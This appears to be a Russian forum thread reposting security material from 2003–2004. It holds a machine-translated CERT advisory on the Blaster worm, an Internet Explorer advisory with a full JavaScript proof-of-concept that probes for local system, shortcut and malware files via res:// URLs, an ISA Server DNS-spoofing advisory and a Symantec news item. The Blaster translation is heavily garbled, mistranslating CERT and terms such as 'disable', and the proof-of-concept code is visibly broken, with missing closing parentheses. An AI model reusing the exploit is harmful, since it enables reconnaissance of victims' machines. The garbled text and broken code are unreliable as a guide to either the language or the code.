Системы, которые затрагивают
Windows NT Microsoft 4.0
Windows 2000 Microsoft
Windows Microsoft XP
Сервер Windows Microsoft 2003
Краткий обзор
СВИДЕТЕЛЬСТВО/МАШИНОПИСНАЯ КОПИЯ получает сообщения широко распространенной деятельности, связанной с новой частью злонамеренного кодекса, известного как W32/Blaster. Этот червь, кажется, эксплуатирует известную уязвимость в Microsoft Отдаленный Запрос Процедуры (RPC) Интерфейс.
I. Описание
W32/Blaster червь эксплуатирует уязвимость в DCOM Microsoft RPC интерфейс как описано в VU*568148 <http://www.kb.cert.org/vuls/id/568148> и CA-2003-16 <http://www.cert.org/advisories/CA-2003-16.html>. После успешного выполнения, червь пытается восстанавливать копию файла msblast.exe от компрометирующего хозяина. Как только этот файл восстановлен, ставившая под угрозу(скомпрометированная) система тогда управляет этим и начинает просматривать для других уязвимых систем, чтобы идти на компромисс в той же самой манере. В ходе распространения, TCP сессия к порту 135 используется, чтобы выполнить нападение. Однако, доступ к TCP портам 139 и 445 может также обеспечить векторы нападения и нужно рассмотреться(счесть) при применении(обращении) стратегий уменьшения. Microsoft издал информацию об этой уязвимости в Бюллетене Безопасности Microsoft MS03-026 <http://microsoft.com/technet/security/bulletin/MS03-026.asp>.
Испытание лаборатории подтвердило, что червь включает способность начать(запустить) TCP SYN нападение опровержения-обслуживания наводнения противwindowsupdate.com <http://windowsupdate.com/>. Мы исследуем условия(состояния), при которых это нападение могло бы проявиться. Необычное или неожиданное движение к windowsupdate.com может указать инфекцию на вашей сети, так что Вы можете желать контролировать движение сети.
Участки(Сайты), которые не используют windowsupdate.com, чтобы управлять заплатами, могут желать блокировать движение за границу к windowsupdate.com. Практически, это может быть трудно достигнуть, с тех пор windowsupdate.com не может решить к тому же самому, обращаются каждый раз. Правильно движение блокирования к windowsupdate.com будет требовать детального понимания вашей архитектуры направления сети, потребностей управления системы, и называть окружающую среду решения. Вы не должны блокировать движение к windowsupdate.com без полного понимания ваших эксплуатационных потребностей.
Мы были в контакте с Microsoft относительно этой возможности этого нападения опровержения-обслуживания.
II. Воздействие
Отдаленный нападавший мог эксплуатировать эту уязвимость, чтобы выполнить произвольный кодекс с Местными привилегиями Системы или причинять условие(состояние) опровержения-обслуживания.
III. Решения
(ПРИМЕЧАНИЕ: Детальные инструкции для того, чтобы возвращать Windows XP системы от W32/Blaster червя могут быть найдены в W32/Blaster Восстановлении <http://www.cert.org/tech_tips/w32_blaster.html> Техническим Наконечником(Чаевыми))
Примените заплаты
Все пользователи поощрены применить заплаты, упомянутые в Бюллетене Безопасности MicrosoftMS03-026 <http://microsoft.com/technet/security/bulletin/MS03-026.asp>как можно скорее чтобы смягчить уязвимость, описанную вVU*568148 <http://www.kb.cert.org/vuls/id/568148>. Эти заплаты также доступны черезМодернизацию WindowsMicrosoft<http://windowsupdate.microsoft.com/>обслуживают.
Системы, управляющие Windows 2000 могут все еще быть уязвимы к по крайней мере нападению опровержения-обслуживания черезVU*326746 <http://www.kb.cert.org/vuls/id/326746>, если их DCOM RPC обслуживание(служба) доступен через сеть. Поэтому, участки(сайты) поощрены использовать подсказки(чаевые) фильтрования пачки ниже в дополнение к применению(обращению) заплат, снабженных вMS03-026 <http://microsoft.com/technet/security/bulletin/MS03-026.asp>.
Сообщалось, что некоторые затронутые машины(механизмы) не способны остаться связанными с сетью достаточно долго, чтобы разгрузить заплаты от Microsoft. Для хозяев в этой ситуации, свидетельство/МАШИНОПИСНАЯ КОПИЯ рекомендует следующее:
Физически разъедините систему от сети.
Проверьте систему для признаков(подписей) компромисса.
В большинстве случаев, инфекция будет обозначена присутствием ключа регистрации(регистратуры) "HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\window s авто модернизация" с ценностью msblast.exe. Другие возможные ценности включают teekids.exe и penis32.exe. Если этот ключ присутствует, удалите это использующий редактора регистрации(регистратуры).
Если Вы заражены(инфицированы), заканчиваете бегущую копию msblast.exe, teekids.exe или penis32.exe, используя Менеджера Задачи.
Поиск и удаляет файлы, названные msblast.exe, teekids.exe или penis32.exe.
Возьмите один из следующих шагов, чтобы защитить против компромисса до монтажа заплаты Microsoft:
Калечьте DCOM как описано вMS03-026 <http://microsoft.com/technet/security/bulletin/MS03-026.asp> и Статье(Изделии) Основы Знания Microsoft825750 <http: // support.microsoft.com/default.aspx? scid=kb; en-us; 825750>.
Позволите Брандмауэр Связи Интернета Microsoft (ICF <http://www.microsoft.com/windowsxp/home/using/howto/homenet/icf.asp> или другую программу фильтрования пачки уровня хозяина блокировать поступающие(наступающие) связи к порту 135/TCP. Информация о ICF доступна в Статье(Изделии) Основы Знания Microsoft283673 <http: // support.microsoft.com/default.aspx? scid=kb; en-us; 283673>.
Повторно соедините систему с сетью, и примените заплаты, на которые упоминают вMS03-026 <http://microsoft.com/technet/security/bulletin/MS03-026.asp>.
Trend Micro, Inc <http://www.trendmicro.com/>издал <http: // wwwtrendmicro.com/vinfo/virusencyclo/default5.asp? VName=WORM_MSBLAST.A> набор шагов, чтобы достигнуть этих целей.Symantec <http://www.symantec.com> такжеиздал <http://securityresponse.symantec.com/avcenter/venc/data/w32.blaster.worm.html> набор шагов, чтобы достигнуть этих целей.
Калечьте DCOM
В зависимости от требований участка(сайта), Вы можете желать калечить DCOM как описано вMS03-026 <http://microsoft.com/technet/security/bulletin/MS03-026.asp>. Выведение из строя DCOM поможет защищать против этой уязвимости, но может также причинить нежелательные побочные эффекты. Дополнительные детали относительно выведения из строя DCOM и возможных побочных эффектов доступны в Статье(Изделии) Основы Знания Microsoft825750 <http: // support.microsoft.com/default.aspx? scid=kb; en-us; 825750>.
Движение сети фильтра
Участки(Сайты) поощрены блокировать доступ сети к следующим уместным портам в границах сети. Это может минимизировать потенциал нападений опровержения-обслуживания, происходящих снаружи периметра. Определенные услуги, которые должны быть блокированы, включают
69/UDP
135/TCP
135/UDP
139/TCP
139/UDP
445/TCP
445/UDP
593/TCP
4444/TCP
Участки(Сайты) должны рассмотреть(счесть) блокирование и прибывающее и движение за границу к этим портам, в зависимости от требований сети, в уровне сети и хозяине.Брандмауэр Связи Интернета Microsoft<http://www.microsoft.com/windowsxp/home/using/howto/homenet/icf.asp> может использоваться, чтобы достигнуть этих целей.
Если доступ не может быть блокирован для всех внешних хозяев, свидетельство/МАШИНОПИСНАЯ КОПИЯ рекомендует доступ ограничения только тем хозяевам, которые требуют этого для нормального действия. Как правило, свидетельство/МАШИНОПИСНАЯ КОПИЯ рекомендует фильтрованию все типы движения сети, которые не требуются для нормального действия.
Поскольку текущие деяния дляVU*568148 <http://www.kb.cert.org/vuls/id/568148> создают заднюю дверь, которая является в некоторых случаях 4444/TCP, блокируя прибывающие TCP сессии к портам, на которых никакие законные услуги не обеспечены, может ограничить доступ злоумышленника компрометированными хозяевами.
Восстановление от компромисса системы
Если Вы полагаете, что система при вашем административном контроле(управлении) была скомпрометирована, пожалуйста следуйте за шагами, выделенными в
Шаги для того, чтобы Оправляться от UNIX или NT Компромисса Системы <http: // wwwcert.org/tech_tips/win-UNIX-system_compromise.html>
Сообщение
СВИДЕТЕЛЬСТВО/МАШИНОПИСНАЯ КОПИЯ отслеживает деятельность, связанную с этим червем как CERT*30479. Уместным экспонатам или деятельности можно послать cert@cert.org с соответствующим СВИДЕТЕЛЬСТВОМ * на подчиненной линии.
Приложение A. Информация Продавца
Это приложение содержит информацию, обеспеченную продавцами. Когда продавцы сообщают о новой информации, эта секция обновлена, и изменения(замены) отмечены в истории пересмотра. Если продавец не упомянут ниже, мы не получили их комментарии.
Microsoft <http: // wwwmicrosoft.com/>
Пожалуйста см. Бюллетень Безопасности MicrosoftMS03-026 <http://microsoft.com/technet/security/bulletin/MS03-026.asp>.
Приложение B. Ссылки(рекомендации)
СВИДЕТЕЛЬСТВО/МАШИНОПИСНАЯ КОПИЯ Консультативный CA-2003-19 - <http://www.cert.org/advisories/CA-2003-19.html>
Примечание Уязвимости СВИДЕТЕЛЬСТВА/МАШИНОПИСНОЙ КОПИИ VU*561284 -<http://www.kb.cert.org/vuls/id/561284>
Примечание Уязвимости СВИДЕТЕЛЬСТВА/МАШИНОПИСНОЙ КОПИИ VU*326746 -<http://www.kb.cert.org/vuls/id/326746>
Бюллетень Безопасности Microsoft MS03-026 -<http://microsoft.com/technet/security/bulletin/MS03-026.asp>
Статья(Изделие) Основы Знания Microsoft 823980 -<http: // support.microsoft.com? kbid=823980>
Благодарность
Наш благодаря Корпорации Microsoft для их обзора и входа(вклада) к этому консультативному.
Авторы:Чад Dougherty, Джеффри Хаврилла, Shawn Hernan, и Мартай Линднер <mailto:cert@cert.org? subject=CA-2003-20%20Feedback>
Этот документ доступен от:<http://www.cert.org/advisories/CA-2003-20.html>
Информация Контакта СВИДЕТЕЛЬСТВА/МАШИНОПИСНОЙ КОПИИ
Пошлите по электронной почте: cert@cert.org <mailto:cert@cert.org>
Звоните: +1 412-268-7090 (24-часовая экстренная связь)
Факс: +1 412-268-6989
Почтовый адрес:
Центр Координации СВИДЕТЕЛЬСТВА
Институт Разработки Программного обеспечения
Carnegie Mellon Университет
Питсбург Пенсильвания 15213-3890
США.
Персонал СВИДЕТЕЛЬСТВА/МАШИНОПИСНОЙ КОПИИ отвечает на экстренную связь 08:00-17:00 восточное стандартное время (5 ПО ГРИНВИЧУ) / ПО ВОСТОЧНОМУ ВРЕМЕНИ (4 ПО ГРИНВИЧУ) с понедельника до пятницы; они находятся на призыве к критическому положению в течение других часов, на американском отпуске, и по уикэндам.
Использование шифрования
Мы настоятельно убеждаем Вас зашифровать чувствительную информацию, посланную электронной почтой. Наша публика PGP ключ доступна от
<http://www.cert.org/CERT_PGP.key>
Если Вы предпочитаете использовать DES, пожалуйста назовите(вызовите) экстренную связь СВИДЕТЕЛЬСТВА за дополнительной информацией.
Получение информации безопасности
Публикации СВИДЕТЕЛЬСТВА и другая информация безопасности доступны от нашего вебсайта
<http://www.cert.org/>
* "СВИДЕТЕЛЬСТВО" и "Центр Координации СВИДЕТЕЛЬСТВА" зарегистрировано в американском Патенте и Офисе Торговой марки.
Поделиться132008-09-07 15:06:56
Раскрытие информации в Microsoft IE
Программа: Microsoft Internet Explorer 6.00.2800
Опасность: Низкая
Наличие эксплоита: Да
Описание:
Уязвимость обнаружена в Microsoft IE. Удаленный атакующий может определить наличие произвольного файла на уязвимой системе.
Удаленный атакующий может создать специальным образом сценарий, который способен определить наличие файлов в директориях WINDOWS, SYSTEM, SYSTEM32, DESKTOP, COMMAND, Internet Explorer, и c:\.
URL производителя: wwwmicrosoft.com
Решение: Решение не существует на данный момент.
Microsoft Internet Explorer permits to examine the existence of local files
Description:
There is a security bug in Microsoft Internet Explorer, which allows to
check up existence of local files in system directories (Root (C:/),
WINDOWS, SYSTEM, SYSTEM32, DESKTOP, COMMAND, Internet Explorer).
Successful exploitation allows the author of a malicious web site to plan
attacks against the target computer.
The bug occurs, because Microsoft Internet Explorer does not open a window,
if the target file exists; but it will open a window, if the file does not
exist.
Also an attacker can use this "feature" to verify existence of local files
(e.g. system files, malware files, shortcuts on Desktop, ...).
Affected software:
Microsoft Internet Explorer
Workaround:
Deactivate "Active Scripting" in the IE options menu.
Proof-of-Concept exploit:
<textarea id="btft" rows="10" cols="75"></textarea><br>
<input type="text" id="btfn" value="iexplore.exe">
<input type="button" value="> Search >"
onClick="alert('File '+btfc(document.all.btfn.value));">
<script>
// Copyright (C) 2004 by Benjamin Tobias Franz (0-1-2-3@gmx.de)
//
// Search for files with known names in following directories:
// Root (C:/), WINDOWS, SYSTEM, SYSTEM32, DESKTOP, COMMAND,
// Internet Explorer
function btfc(btfp){
var btfe=0,btfp;
try{window.open("res://"+btfp,"_search";}
catch(e){btfe=1;}
if(btfe==1)return "'"+btfp+"' exists!\n";
else return "'"+btfp+"' does NOT exist!\n";}
var btfd="",btfv="BTF-AntiVirus: Search for '";
btfd+="Search for system files ...\n";
btfd+=btfc("autoexec.bat";
btfd+=btfc("msdos.sys";
btfd+=btfc("twain.dll";
btfd+=btfc("swflash.ocx";
btfd+=btfc("shell32.dll";
btfd+=btfc("test.txt";
btfd+=btfc("test.btf";
btfd+="\nSearch for shortcut files (on desktop) ...\n";
btfd+=btfc("Microsoft Word.lnk";
btfd+=btfc("IrfanView.lnk";
btfd+=btfc("Opera.lnk";
btfd+=btfc("Mozilla.lnk";
btfd+=btfc("Netscape 6.lnk";
btfd+=btfc("Netscape 7.lnk";
btfd+=btfc("btf.lnk";
btfd+="\nSearch for virus/worm files ...\n";
btfd+=btfv+"Badtrans' : "+btfc("kernel32.exe";
btfd+=btfv+"MTX' : "+btfc("wsock32.mtx";
btfd+=btfv+"MyLife.j' : "+btfc("usa.scr";
btfd+=btfv+"MyLife.f' : "+btfc("list480.txt.scr";
btfd+=btfv+"MyLife.c' : "+btfc("list.txt.scr";
btfd+=btfv+"MyLife.b' : "+btfc("cari.scr";
btfd+=btfv+"MyLife.a' : "+btfc("my life.scr";
btfd+=btfv+"Gibe' : "+btfc("bctool.exe ";
btfd+=btfv+"Klez' : "+btfc("wqk.exe";
btfd+=btfv+"MyParty' : "+btfc("regctrl.exe";
btfd+=btfv+"Maldal' : "+btfc("win.exe";
btfd+=btfv+"Gokar' : "+btfc("karen.exe";
// ...
document.all.btft.value=
"Copyright (C) 2004 by Benjamin Tobias Franz (0-1-2-3@gmx.de)\n\n"+
btfd;
</script>
Date of discovery:
06. November 2004
Tested in Microsoft Internet Explorer 6 SP1 (6.0.2800.1106) with all
patches installed on Windows 98.
My DLL versions:
MSHTML.DLL: 6.00.2800.1477
BROWSEUI.DLL: 6.00.2800.1596 (xpsp2.040919-1003)
SHDOCVW.DLL: 6.00.2800.1596 (xpsp2.040919-1003)
SHLWAPI.DLL: 6.00.2800.1584 (xpsp2.040720-1705)
URLMON.DLL: 6.00.2800.1475
WININET.DLL: 6.00.2800.1475
Regards,
Benjamin Tobias Franz
Germany
Поделиться142008-09-07 15:07:39
Подмена содержимого web страниц в Microsoft ISA 2000 и Proxy Server
Программа: Microsoft ISA Server 2000, Microsoft Proxy Server 2.x, Microsoft Small Business Server 2000
Опасность: Средняя
Наличие эксплоита: Нет
Описание:
Обнаружена уязвимость в Microsoft ISA Server 2000 и Proxy Server 2.0. Удаленный атакующий может подменить содержимое Интернет страниц.
Уязвимость существует при кэшировании результатов обратного DNS запроса. Проблема возникает из-за того, что результаты обратного запроса используются для прямого DNS запроса. Удаленный атакующий может специальным образом сконфигурировать DNS сервер и подделать результат обратного запроса для произвольного домена. Успешная эксплуатация этой уязвимости позволит злоумышленнику заманить целевого пользователя на злонамеренный сайт с целью хищения личных данных пользователя.
Заметка: Атакующий не сможет подделать SSL сертификат, принадлежащий к другому доменному имени
URL производителя: wwwmicrosoft.com
Решение: Установите обновления
Microsoft Proxy Server 2.0 (requires SP1):
http://www.microsoft.com/downloads/deta … laylang=en
Microsoft ISA Server 2000 (requires SP1, FP1, or SP2):
http://www.microsoft.com/downloads/deta … laylang=en
Поделиться152008-09-07 15:08:35
Symantec выпустила антивирус для смартфонов Nokia
Вирусы, трояны и различные «червячки» не оставляют без работы антивирусные компании. Недавнее появление вирусов для мобильных телефонов, наладонников и других мобильных устройств прибавило головную боль их владельцам, а антивирусные компании получили новую область для извлечения прибылей.
До сих пор вирусы для мобильных телефонов не были большой проблемой. Из-за небольших скоростей передачи данных и отсутствия единых стандартизированных платформ распространение вирусов тормозится. Появление вируса Caribe показало перспективность деятельности «вирусописателей».
Компании, специализирующиеся на выпуске антивирусных программ, решились на ответный удар. Symantec объявила о своем намерении выпускать антивирусные решения для мобильных телефонов и смартфонов. Чуть ранее на этой неделе Symantec уже представила приложение Client Security для двух смартфонов Nokia, использующих операционную систему Symbian — Nokia 9500 Communicator и 9300. В состав Client Security входит как фаервол для отражения хакерских атак, так и система для защиты от вирусов.